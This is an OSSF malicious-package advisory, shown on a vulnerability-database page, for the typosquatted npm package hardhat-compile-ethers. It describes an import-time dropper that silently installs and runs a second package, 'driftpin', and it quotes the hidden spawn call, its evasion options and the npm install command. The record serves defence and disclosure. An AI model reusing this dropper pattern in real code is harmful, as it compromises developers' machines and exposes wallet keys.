mal-2026-6705
Vulnerability from ossf_malicious_packages
Published
2026-07-01 18:41
Modified
2026-07-01 19:13
Summary
Malicious code in hardhat-compile-ethers (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (3bb9781577ff17698d2cb66a6cd832fe8bdda014b30c0c662055a45d42801ac1)

The package's main entry dist/src/index.js contains a payload appended after the legitimate Hardhat exports. On require/import (e.g. when Hardhat loads the user's config), it spawns a detached Node child (spawn(process.execPath, ['-e', code], {detached:true, stdio:'ignore', windowsHide:true})) that runs a base64-decoded command to silently npm install driftpin --no-save --silent --no-audit --no-fund, then require('driftpin') and invoke getPlugin()(), executing attacker-controlled code in the installer's Node process. Both the shell command and the module name 'driftpin' are base64-encoded to hide them from casual inspection, and the spawn options (detached, stdio ignored, windows window hidden) are evasion mechanics. The payload is absent from the TypeScript source (src/index.ts) and only appears in the published dist artifact, indicating post-build injection. The package name mimics legitimate Hardhat/ethers plugins (e.g. @nomicfoundation/hardhat-ethers, hardhat-deploy-ethers) and the README is copied from wighawag/hardhat-deploy, making this a typosquat that delivers a dependency-chain dropper. Installers are typically Hardhat development machines that hold wallet keys and signing material, making arbitrary code execution on import especially damaging.

CWE
  • CWE-506 - The product contains code that appears to be malicious in nature.
  • CWE-506 - The product contains code that appears to be malicious in nature.
  • CWE-506 - The product contains code that appears to be malicious in nature.
  • CWE-506 - The product contains code that appears to be malicious in nature.
  • CWE-506 - The product contains code that appears to be malicious in nature.
  • CWE-506 - The product contains code that appears to be malicious in nature.
  • CWE-506 - The product contains code that appears to be malicious in nature.
  • CWE-506 - The product contains code that appears to be malicious in nature.
  • CWE-506 - The product contains code that appears to be malicious in nature.
  • CWE-506 - The product contains code that appears to be malicious in nature.
  • CWE-506 - The product contains code that appears to be malicious in nature.
  • CWE-506 - The product contains code that appears to be malicious in nature.
  • CWE-506 - The product contains code that appears to be malicious in nature.
Credits

{
  "affected": [
    {
      "database_specific": {
        "cwes": [
          {
            "cweId": "CWE-506",
            "description": "The product contains code that appears to be malicious in nature.",
            "name": "Embedded Malicious Code"
          },
          {
            "cweId": "CWE-506",
            "description": "The product contains code that appears to be malicious in nature.",
            "name": "Embedded Malicious Code"
          },
          {
            "cweId": "CWE-506",
            "description": "The product contains code that appears to be malicious in nature.",
            "name": "Embedded Malicious Code"
          },
          {
            "cweId": "CWE-506",
            "description": "The product contains code that appears to be malicious in nature.",
            "name": "Embedded Malicious Code"
          },
          {
            "cweId": "CWE-506",
            "description": "The product contains code that appears to be malicious in nature.",
            "name": "Embedded Malicious Code"
          },
          {
            "cweId": "CWE-506",
            "description": "The product contains code that appears to be malicious in nature.",
            "name": "Embedded Malicious Code"
          },
          {
            "cweId": "CWE-506",
            "description": "The product contains code that appears to be malicious in nature.",
            "name": "Embedded Malicious Code"
          },
          {
            "cweId": "CWE-506",
            "description": "The product contains code that appears to be malicious in nature.",
            "name": "Embedded Malicious Code"
          },
          {
            "cweId": "CWE-506",
            "description": "The product contains code that appears to be malicious in nature.",
            "name": "Embedded Malicious Code"
          },
          {
            "cweId": "CWE-506",
            "description": "The product contains code that appears to be malicious in nature.",
            "name": "Embedded Malicious Code"
          },
          {
            "cweId": "CWE-506",
            "description": "The product contains code that appears to be malicious in nature.",
            "name": "Embedded Malicious Code"
          },
          {
            "cweId": "CWE-506",
            "description": "The product contains code that appears to be malicious in nature.",
            "name": "Embedded Malicious Code"
          },
          {
            "cweId": "CWE-506",
            "description": "The product contains code that appears to be malicious in nature.",
            "name": "Embedded Malicious Code"
          }
        ],
        "indicators": {
          "evidence_files": [
            {
              "path": "dist/src/index.js",
              "sha256": "7de1080e1a3fdcfcedbe49bc8d587fb856f3bfc06d8bdc1750f40228fcf45f61",
              "tlsh": "e751e2a32797a1302b370fadcb0b1c5663a352932ad891a0f7ed95121f8218951b39c9"
            },
            {
              "path": "package.json",
              "sha256": "d5cdd23b692a6e0a213c2a889a398195837f2033e748241c69dee5257beb6dd1",
              "tlsh": "41318960cc19cd2307d85595ac7a429361649a470ca6fc2c73a52bbf4f0c2af21b9abd"
            }
          ],
          "package_integrity": [
            {
              "filename": "hardhat-compile-ethers-0.4.7.tgz",
              "hashes": {
                "sha1": "e718d781b11897329c9747c5fd57a1677ea24110",
                "sha512_sri": "sha512-jZX1Kng+W6pbRo0AaYeOa9T9Pw2I3jfP4IS+VPjc2btcfG4qr4IH9o6J352wbyVbVrWO0XDDpb8FfJTaADBneg=="
              }
            }
          ]
        }
      },
      "package": {
        "ecosystem": "npm",
        "name": "hardhat-compile-ethers"
      },
      "versions": [
        "0.4.7",
        "0.4.10",
        "0.4.12",
        "0.4.11",
        "0.4.8",
        "0.4.6",
        "0.4.5",
        "0.4.4",
        "0.4.2",
        "0.4.0",
        "0.4.3",
        "0.0.1",
        "0.4.9"
      ]
    }
  ],
  "credits": [
    {
      "contact": [
        "inspector-research@amazon.com"
      ],
      "name": "Amazon Inspector",
      "type": "FINDER"
    }
  ],
  "database_specific": {
    "malicious-packages-origins": [
      {
        "id": "IN-MAL-2026-007865",
        "import_time": "2026-07-01T19:11:25.632444026Z",
        "modified_time": "2026-07-01T18:42:56Z",
        "sha256": "180936274762437e2311a83f716cbbf9fcaaaef8e194b950bfa28192bfb44bf8",
        "source": "amazon-inspector",
        "versions": [
          "0.4.7"
        ]
      },
      {
        "id": "IN-MAL-2026-007863",
        "import_time": "2026-07-01T19:11:25.404233578Z",
        "modified_time": "2026-07-01T18:42:38Z",
        "sha256": "2852e841d953072a439342e58a63f91a6f4047c122d337ad57bc4f4adad45f81",
        "source": "amazon-inspector",
        "versions": [
          "0.4.10"
        ]
      },
      {
        "id": "IN-MAL-2026-007856",
        "import_time": "2026-07-01T19:11:24.475165466Z",
        "modified_time": "2026-07-01T18:41:35Z",
        "sha256": "3bb9781577ff17698d2cb66a6cd832fe8bdda014b30c0c662055a45d42801ac1",
        "source": "amazon-inspector",
        "versions": [
          "0.4.12"
        ]
      },
      {
        "id": "IN-MAL-2026-007861",
        "import_time": "2026-07-01T19:11:25.142169343Z",
        "modified_time": "2026-07-01T18:42:18Z",
        "sha256": "51a9a1265ba62d0c900be1a70b6fb28386f2e25cc3e31855fc5b3f58530cae47",
        "source": "amazon-inspector",
        "versions": [
          "0.4.11"
        ]
      },
      {
        "id": "IN-MAL-2026-007864",
        "import_time": "2026-07-01T19:11:25.528163378Z",
        "modified_time": "2026-07-01T18:42:46Z",
        "sha256": "70318ad0a21e7e2e412adfb362788a771ff49831a01481de94c60d7903634f36",
        "source": "amazon-inspector",
        "versions": [
          "0.4.8"
        ]
      },
      {
        "id": "IN-MAL-2026-007866",
        "import_time": "2026-07-01T19:11:25.775808651Z",
        "modified_time": "2026-07-01T18:43:07Z",
        "sha256": "95bb3eefd23fcfaf7a9da242c86085f6b7d1cda8344a82a8219789beefe60c12",
        "source": "amazon-inspector",
        "versions": [
          "0.4.6"
        ]
      },
      {
        "id": "IN-MAL-2026-007870",
        "import_time": "2026-07-01T19:11:26.226038725Z",
        "modified_time": "2026-07-01T18:43:43Z",
        "sha256": "a1d54b1992fb2f6fa590ca2b76dd65574a18a0659f43294aa2fdf0588abe4062",
        "source": "amazon-inspector",
        "versions": [
          "0.4.5"
        ]
      },
      {
        "id": "IN-MAL-2026-007869",
        "import_time": "2026-07-01T19:11:26.129866344Z",
        "modified_time": "2026-07-01T18:43:34Z",
        "sha256": "d572224fcf90c82c0626008128d7a1fd790e480ec4c3b4fa5292eeb3d610bf81",
        "source": "amazon-inspector",
        "versions": [
          "0.4.4"
        ]
      },
      {
        "id": "IN-MAL-2026-007867",
        "import_time": "2026-07-01T19:11:25.903639151Z",
        "modified_time": "2026-07-01T18:43:17Z",
        "sha256": "dee0fafd7c2ba309f9b3b1ae8f7e4d54c9d82c630bdbaa176044b9e054cf08c9",
        "source": "amazon-inspector",
        "versions": [
          "0.4.2"
        ]
      },
      {
        "id": "IN-MAL-2026-007872",
        "import_time": "2026-07-01T19:11:26.500370955Z",
        "modified_time": "2026-07-01T18:43:59Z",
        "sha256": "55a890434cfd92fb846ba508acebf110f286a083dc029651ebecb781528e6f39",
        "source": "amazon-inspector",
        "versions": [
          "0.4.0"
        ]
      },
      {
        "id": "IN-MAL-2026-007868",
        "import_time": "2026-07-01T19:11:26.029254479Z",
        "modified_time": "2026-07-01T18:43:25Z",
        "sha256": "845a969efc54f4b45826b4bd051aa1adea7c2a983ce97e0665e0c7107f4f2ce3",
        "source": "amazon-inspector",
        "versions": [
          "0.4.3"
        ]
      },
      {
        "id": "IN-MAL-2026-007871",
        "import_time": "2026-07-01T19:11:26.358013817Z",
        "modified_time": "2026-07-01T18:43:50Z",
        "sha256": "c807ea26446e2a048c154c7a3c035c22db3c42ceede57a307195256a3f11e540",
        "source": "amazon-inspector",
        "versions": [
          "0.0.1"
        ]
      },
      {
        "id": "IN-MAL-2026-007862",
        "import_time": "2026-07-01T19:11:25.289124822Z",
        "modified_time": "2026-07-01T18:42:31Z",
        "sha256": "d1e4d2af59e7b9e792f78d9335e437080b45295155a778e9d336e23f809e325f",
        "source": "amazon-inspector",
        "versions": [
          "0.4.9"
        ]
      }
    ]
  },
  "details": "\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (3bb9781577ff17698d2cb66a6cd832fe8bdda014b30c0c662055a45d42801ac1)\nThe package\u0027s main entry dist/src/index.js contains a payload appended after the legitimate Hardhat exports. On require/import (e.g. when Hardhat loads the user\u0027s config), it spawns a detached Node child (`spawn(process.execPath, [\u0027-e\u0027, code], {detached:true, stdio:\u0027ignore\u0027, windowsHide:true})`) that runs a base64-decoded command to silently `npm install driftpin --no-save --silent --no-audit --no-fund`, then `require(\u0027driftpin\u0027)` and invoke `getPlugin()()`, executing attacker-controlled code in the installer\u0027s Node process. Both the shell command and the module name \u0027driftpin\u0027 are base64-encoded to hide them from casual inspection, and the spawn options (detached, stdio ignored, windows window hidden) are evasion mechanics. The payload is absent from the TypeScript source (src/index.ts) and only appears in the published dist artifact, indicating post-build injection. The package name mimics legitimate Hardhat/ethers plugins (e.g. @nomicfoundation/hardhat-ethers, hardhat-deploy-ethers) and the README is copied from wighawag/hardhat-deploy, making this a typosquat that delivers a dependency-chain dropper. Installers are typically Hardhat development machines that hold wallet keys and signing material, making arbitrary code execution on import especially damaging.\n",
  "id": "MAL-2026-6705",
  "modified": "2026-07-01T19:13:18Z",
  "published": "2026-07-01T18:41:35Z",
  "references": [
    {
      "type": "PACKAGE",
      "url": "https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.7"
    },
    {
      "type": "PACKAGE",
      "url": "https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.10"
    },
    {
      "type": "PACKAGE",
      "url": "https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.12"
    },
    {
      "type": "PACKAGE",
      "url": "https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.11"
    },
    {
      "type": "PACKAGE",
      "url": "https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.8"
    },
    {
      "type": "PACKAGE",
      "url": "https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.6"
    },
    {
      "type": "PACKAGE",
      "url": "https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.5"
    },
    {
      "type": "PACKAGE",
      "url": "https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.4"
    },
    {
      "type": "PACKAGE",
      "url": "https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.2"
    },
    {
      "type": "PACKAGE",
      "url": "https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.0"
    },
    {
      "type": "PACKAGE",
      "url": "https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.3"
    },
    {
      "type": "PACKAGE",
      "url": "https://www.npmjs.com/package/hardhat-compile-ethers/v/0.0.1"
    },
    {
      "type": "PACKAGE",
      "url": "https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.9"
    }
  ],
  "schema_version": "1.7.4",
  "summary": "Malicious code in hardhat-compile-ethers (npm)"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…